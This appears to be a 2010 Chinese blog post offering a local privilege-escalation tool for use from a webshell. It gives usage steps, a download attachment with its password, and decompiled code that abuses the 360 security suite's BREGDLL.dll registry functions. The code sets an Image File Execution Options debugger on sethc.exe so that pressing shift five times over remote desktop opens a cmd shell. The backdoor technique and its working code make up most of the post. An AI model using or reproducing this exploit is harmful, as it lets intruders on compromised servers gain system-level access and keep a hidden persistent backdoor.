360本地提权(Webshell下用)
发布:admin | 发布时间: 2010年2月3日作者: friddy
在webshell下运行360test.exe
成功后,3389到服务器,按5下shift,得到一个cmd
附件地址:360up.rar
密码friddy
没加壳。。。直接F5下。。。调用了BREGDLL.dll的导出函数,然后利用了映像劫持的debugger。。。安装了shift后门。。
有码有真相:预览源代码打印关于
01 signed int __cdecl sub_401000()
02 {
03 signed int v0; // ecx@3
04 char *v1; // edi@3
05 signed int v2; // ecx@7
06 unsigned int v3; // ebx@7
07 BYTE *v4; // edi@7
08 const void *v5; // esi@7
09 HMODULE v6; // eax@11
10 HMODULE v7; // esi@11
11 FARPROC v8; // eax@12
12 int (*v9)(void); // ebx@12
13 LSTATUS v11; // esi@2
14 char v12; // zf@5
15 signed int v13; // ecx@7
16 char v14; // zf@9
17 BYTE LibFileName; // [sp+18h] [bp-124h]@1
18 DWORD cbData; // [sp+10h] [bp-12Ch]@1
19 char v17; // [sp+19h] [bp-123h]@1
20 __int16 v18; // [sp+139h] [bp-3h]@1
21 char v19; // [sp+13Bh] [bp-1h]@1
22 HKEY hKey; // [sp+Ch] [bp-130h]@1
23 DWORD Type; // [sp+14h] [bp-128h]@2
24
25 LibFileName = 0;
26 cbData = 260;
27 memset(&v17, 0, 0x120u);
28 v18 = 0;
29 v19 = 0;
30 if ( RegOpenKeyA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe", &hKey) >= 0 )
31 {
32 Type = 1;
33 v11 = RegQueryValueExA(hKey, "Path", 0, &Type, &LibFileName, &cbData);
34 RegCloseKey(hKey);
35 if ( v11 >= 0 )
36 {
37 v1 = "\\deepscan\\BREGDLL.dll";
38 v0 = -1;
39 do
40 {
41 if ( !v0 )
42 break;
43 v12 = *v1++ == 0;
44 --v0;
45 }
46 while ( !v12 );
47 v13 = ~v0;
48 v5 = &v1[-v13];
49 v3 = v13;
50 v4 = &LibFileName;
51 v2 = -1;
52 do
53 {
54 if ( !v2 )
55 break;
56 v14 = *v4++ == 0;
57 --v2;
58 }
59 while ( !v14 );
60 memcpy(v4 - 1, v5, v3);
61 v6 = LoadLibraryA((const CHAR *)&LibFileName);
62 v7 = v6;
63 if ( v6 )
64 {
65 v9 = (int (*)(void))GetProcAddress(v6, "InitRegEngine");
66 BRegDeleteKey = (int)GetProcAddress(v7, "BRegDeleteKey");
67 BRegOpenKey = (int (__stdcall *)(_DWORD, _DWORD, _DWORD))GetProcAddress(v7, "BRegOpenKey");
68 BRegCloseKey = (int (__stdcall *)(_DWORD))GetProcAddress(v7, "BRegCloseKey");
69 BRegSetValueEx = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))GetProcAddress(
70 v7,
71 "BRegSetValueEx");
72 v8 = GetProcAddress(v7, "BRegCreateKeyEx");
73 BRegCreateKeyEx = (int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))v8;
74 if ( v9 && BRegDeleteKey && BRegOpenKey && BRegCloseKey && BRegSetValueEx && v8 && v9() )
75 return 1;
76 FreeLibrary(v7);
77 }
78 }
79 }
80 return 0;
81 }
预览源代码打印关于01 int __fastcall sub_401170(int a1)
02 {
03 int result; // eax@1
04 int v2; // esi@2
05 int v3; // [sp+48h] [bp-4h]@1
06
07 v3 = a1;
08 result = BRegOpenKey(
09 -2147483646,
10 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
11 &v3);
12 if ( result >= 0 )
13 {
14 BRegCreateKeyEx(
15 -2147483646,
16 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
17 0,
18 0,
19 1,
20 983103,
21 0,
22 &v3,
23 0);
24 v2 = BRegSetValueEx(v3, "debugger", 0, 1, "c:\\windows\\system32\\cmd.exe", 28);
25 BRegCloseKey(v3);
26 result = v2;
27 }
28 return result;
29 }
文章如转载,请注明转载自:http://www.5iadmin.com/post/218.html
- 相关文章:
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
